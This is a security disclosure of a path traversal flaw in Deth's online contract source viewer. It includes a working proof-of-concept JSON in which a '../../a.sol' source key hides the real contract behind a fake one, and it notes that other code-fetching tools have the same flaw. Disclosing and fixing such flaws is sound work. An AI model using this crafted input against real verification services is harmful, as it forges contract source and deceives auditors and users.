Description
Path Traversal Issue in Deth Online Vscode Source Code Viewer
Introduction
A path traversal issue (a "../" in a source file path) has been discovered in Deth's VS Code-based online source code viewer. The issue allows an attacker to redirect verification paths into parent directories, thereby hiding specific real contract source files. The result is source code forgery: an attacker can deceive users and auditors during contract verification.
By submitting a specially crafted JSON file for source code verification, an attacker can exploit a flaw in Deth's directory handling. The actual source file ../../a.sol is overwritten and hidden, while the fake, malicious source file a.sol is what the directory view displays.
Using this issue, an attacker can replace verified contract code with malicious code, potentially misleading auditors or users into believing they are reviewing the legitimate source code.
Example JSON
Below is an example JSON file demonstrating the Issue:
{
  "language": "Solidity",
  "sources": {
    "a.sol": {
      "content": "// SPDX-License-Identifier: GPL-3.0\npragma solidity >=0.7.0 <0.9.0;\ncontract Owner {\n    address private Hacker;\n    function bad(address newOwner) public {\n        Hacker = address(0x0);\n    }\n}"
    },
    "../../a.sol": {
      "content": "// SPDX-License-Identifier: GPL-3.0\npragma solidity >=0.7.0 <0.9.0;\ncontract Owner {\n    address private owner;\n    function changeOwner(address newOwner) public {\n        owner = newOwner;\n    }\n}"
    }
  },
  "settings": {}
}
By submitting this crafted JSON file, the actual source file ../../a.sol is concealed, while the fake file a.sol containing the malicious code is displayed in the directory.
Below are links illustrating the exploitation:
https://sepolia.etherscan.deth.net/address/0xb7e278f0116508c611f8a486666d3823e51c44dc
Recommendations
- Implement strict path sanitization so that "../" cannot be used for directory traversal in source file paths.
We also found the same issue in Forge, Metasuite, Blockscan and crytic-based tools like Slither, so this is a common issue for code fetcher tools, but we also think this is a risky issue that needs some better practice.
Thank you very much for providing such a powerful tool; it's a great convenience for us, and hopefully this discovery will allow me to contribute something to the tool.
